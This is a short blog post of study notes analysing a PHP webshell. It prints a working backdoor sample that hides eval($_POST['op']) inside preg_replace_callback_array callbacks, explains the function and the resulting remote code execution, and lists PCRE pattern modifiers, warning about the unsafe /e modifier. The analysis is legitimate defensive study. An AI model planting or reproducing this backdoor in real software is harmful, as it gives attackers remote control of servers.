[1.16]Today of php Trojan analysis

最新推荐文章于 2023-12-27 17:27:59 发布

Pz_mstr

最新推荐文章于 2023-12-27 17:27:59 发布

阅读量265

点赞数

分类专栏：【每日学习】【毕业设计】文章标签： php

本文链接：https://blog.csdn.net/qq_35544379/article/details/86515821

版权

【每日学习】同时被 2 个专栏收录

48 篇文章 1 订阅

订阅专栏

【毕业设计】

3 篇文章 0 订阅

订阅专栏

中文摘要

每日记录。最近生病了，就一个样例
本文内容包含php木马分析，函数preg_replace_callback_array，php正则匹配模式学习

Sample1

<?php
    $subject = 'little hann';

    preg_replace_callback_array(
        [
        '~[t]+~i' => function ($match) {
            eval($_POST['op']);
        },
        '~[n]+~i' => function ($match) {
            eval($_POST['op']);
        }
        ],
        $subject
    );
?>

Analysis

Function:preg_replace_callback_array

use a example to show it usage

<?php
$subject = 'Aaaaaa Bbb';

preg_replace_callback_array(
    [
        '~[a]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "a" found', PHP_EOL;
        },
        '~[b]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "b" found', PHP_EOL;
        }
    ],
    $subject
);
?>

THE OUTPUT IS

6 matches for "a" found
3 matches for "b" found

IN THE TROJAN

So,this function will regex match a string which include the char ‘n’ or ‘t’,And then attack post the command through parameter 'op' to achieve RCE attack

Need to remember: PHP RCRE Pattern Modifiers

http://php.net/manual/en/reference.pcre.pattern.modifiers.php

i: latters in the pattern mattch both upper and lower case
m(MULTILINE): match every immediately following or immediately before any newline in the subject string
s(DOTALL): a dot metacharacter in the pattern matches all characters, including newlines
x(EXTENDED): whitespace data characters in the pattern are totally ignored except when escaped or inside a character class, and characters between an unescaped
e(REPLACE_EVAL): does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string

Pleases pay attention to this one,is unsafe.This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0.

A: it is constrained to match only at the start of the string which is being searched (the “subject string”)[i cant understand it,maybe i can understand it after experiment ]
D(DOLLAR_ENDONLY): a dollar metacharacter in the pattern matches only at the end of the subject string
S: perform extra analysis for a reuse pattern
U(UNGREEDY): inverts the “greediness” of the quantifiers so that they are not greedy by default, but become greedy if followed by ?.
X: Any backslash in a pattern that is followed by a letter that has no special meaning causes an error
J: this setting will changes the local PCRE_DUPNAMES option to Allow duplicate names for subpatterns.
u(UFT8): Pattern and subject strings are treated as UTF-8

frequently-used maybe:
i,m,s,x
dont use
e

Pz_mstr

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[1.16]Today of php Trojan analysis

中文摘要每日记录。最近生病了，就一个样例本文内容包含php木马分析，函数preg_replace_callback_array，php正则匹配模式学习Sample1&lt;?php $subject = 'little hann'; preg_replace_callback_array( [ '~[t]+~i' =&gt; functio...
复制链接

扫一扫

专栏目录